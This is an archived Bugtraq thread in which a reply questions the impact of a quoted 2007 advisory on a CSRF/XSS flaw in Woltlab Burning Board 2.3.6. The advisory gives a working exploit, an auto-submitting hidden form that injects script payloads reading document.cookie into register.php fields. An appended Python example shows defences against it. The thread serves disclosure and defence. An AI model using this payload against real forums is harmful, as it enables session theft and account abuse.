Re: Woltlab Burning Board (wbb) 2.3.6 CSRF/XSS - 0day

Board: Bugtraq  Author: (not recorded)  Time: 19 years ago (2007/03/03 04:08), edited, upvotes 0 (0/0/0)
0 comments, 0 participants, thread 2/2
On my WBB 2.3.3 (and I think this is the default setting) you cannot access register.php when logged in (even as admin). So you need to be logged off to open the evil site. And when you are logged off, the cookie is simply useless. Also, on my forum, only r_dateformat and r_timeformat are affected.

regards

2007/3/2, SaMuschie <samuschie@yahoo.de>:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> +--------------------------------------- - -- -
> | SaMuschie Research Labs proudly presents . . .
> +------------------------------------------- -- - -
> | Application: Woltlab Burning Board (wbb)
> | Version: 2.3.6 (others not tested)
> | Vuln./Exploit Type: CSRF/XSS
> | Status: 0day
> +----------------------------------------- -- - -
> | Discovered by: Samenspender
> | Released: 20070302
> | SaMuschie Release Number: 5
> +------------------------------- - -- -
>
> CSRF/XSS Exploit:
>
> cat <<EOF > wetpussy.html
> <form name='evilform' method='POST' action='http://victimhost/wbb2/register.php'>
> <input type=hidden name=r_username value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=r_email value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=r_password value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=r_confirmpassword value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=key_string value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=key_number value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=r_homepage value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=r_icq value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=r_aim value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=r_yim value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=r_msn value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=r_day value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=r_month value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=r_year value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=r_gender value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=r_signature value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=disablesmilies value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=disablebbcode value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=disableimages value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=r_usertext value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=field%5B1%5D value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=field%5B2%5D value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=field%5B3%5D value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=r_invisible value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=r_usecookies value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=r_admincanemail value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=r_showemail value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=r_usercanemail value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=r_emailnotify value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=r_notificationperpm value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=r_receivepm value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=r_emailonpm value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=r_pmpopup value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=r_showsignatures value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=r_showavatars value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=r_showimages value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=r_daysprune value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=r_umaxposts value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=r_threadview value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=r_dateformat value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=r_timeformat value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=r_startweek value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=r_timezoneoffset value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=r_usewysiwyg value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=r_styleid value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=r_langid value='"><script>alert("Cookie: " + document.cookie)</script><lol="'>
> <input type=hidden name=send value='send'>
> <input type=hidden name=sid value=''>
> <input type=hidden name=disclaimer value='viewed'>
> </form>
> <body onload=javascript:document.forms['evilform'].submit();>
> EOF
>
> +----------------------------- -- -
> | Lameness Disclaimer
> +------------------------------------- - -- - -
> | SaMuschie Research Labs was founded to publish
> | vulnerabilities within well known software products,
> | which are easy to discover and exploit.
> |
> | SaMuschie researchers just spend a minimum of time
> | and knowledge for each vulnerability. Hence readers of
> | this advisory are requested not to ask any questions
> | to the researchers.... they don't know the answer ;)
> +---------------------------------- - -- - -
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.6 (GNU/Linux)
>
> iD8DBQFF6AyiMFgfGpQK8VERAsieAJwIMk+g0Y70cV6dR5YtsMfq4U+5fgCfWWzD
> Qg6at+bMTnvHbw0SYyXk5ko=
> =7wPg
> -----END PGP SIGNATURE-----
>
> ___________________________________________________________
> The early bird catches the worm. Get the new Yahoo! Mail here: http://mail.yahoo.de
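An added example, not code from the advisory or from WBB, showing in Python the defensive points this thread turns on: a registration handler that refuses logged-in sessions (the behaviour the reply describes), a per-session CSRF token that a cross-site auto-submitting form cannot supply, and attribute-escaping of the reflected r_dateformat/r_timeformat values so the advisory's `">` payload cannot break out. The function names, the HMAC token scheme and the session layout are assumptions.

```python
import hashlib
import hmac
import secrets
from html import escape

# Payload quoted in the advisory (constructed here as a test value, not a live request).
ADVISORY_PAYLOAD = '"><script>alert("Cookie: " + document.cookie)</script><lol="'
REFLECTED_FIELDS = ("r_dateformat", "r_timeformat")  # the fields the reply found affected

def render_field_vulnerable(name: str, value: str) -> str:
    """Pattern the advisory exploits: the submitted value is echoed raw into an attribute."""
    return f'<input type="text" name="{name}" value="{value}">'

def render_field_safe(name: str, value: str) -> str:
    """Fix: attribute-escape before reflecting, so '">' cannot close the attribute."""
    return f'<input type="text" name="{name}" value="{escape(value, quote=True)}">'

def csrf_token(secret: bytes, sid: str) -> str:
    """Assumed scheme: token = HMAC(server secret, session id). A cross-site page can
    make the browser attach the cookie, but it can neither read nor compute this value."""
    return hmac.new(secret, sid.encode(), hashlib.sha256).hexdigest()

def handle_register(form: dict, session: dict, secret: bytes) -> tuple[int, str]:
    """Hypothetical hardened register.php logic (not WBB's own code)."""
    # Mirrors the behaviour the reply describes: registration is refused to a
    # logged-in session, so a forged request riding on an admin cookie does nothing.
    if session.get("user_id"):
        return 403, "registration is not available while logged in"
    # Synchronizer token: reject any request lacking the per-session secret.
    expected = csrf_token(secret, session["sid"])
    if not hmac.compare_digest(form.get("csrf_token", ""), expected):
        return 403, "missing or invalid CSRF token"
    body = "\n".join(render_field_safe(f, form.get(f, "")) for f in REFLECTED_FIELDS)
    return 200, body

if __name__ == "__main__":
    secret = secrets.token_bytes(32)
    anon = {"sid": secrets.token_hex(16)}          # logged-off visitor, as in the advisory
    forged = {f: ADVISORY_PAYLOAD for f in REFLECTED_FIELDS} | {"sid": "", "send": "send"}
    print(handle_register(forged, anon, secret))    # 403: the forged form carries no token
    forged["csrf_token"] = csrf_token(secret, anon["sid"])
    print(handle_register(forged, anon, secret)[1]) # 200, payload rendered inert
```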
Article code (AID): #15w8GX00 (Bugtraq)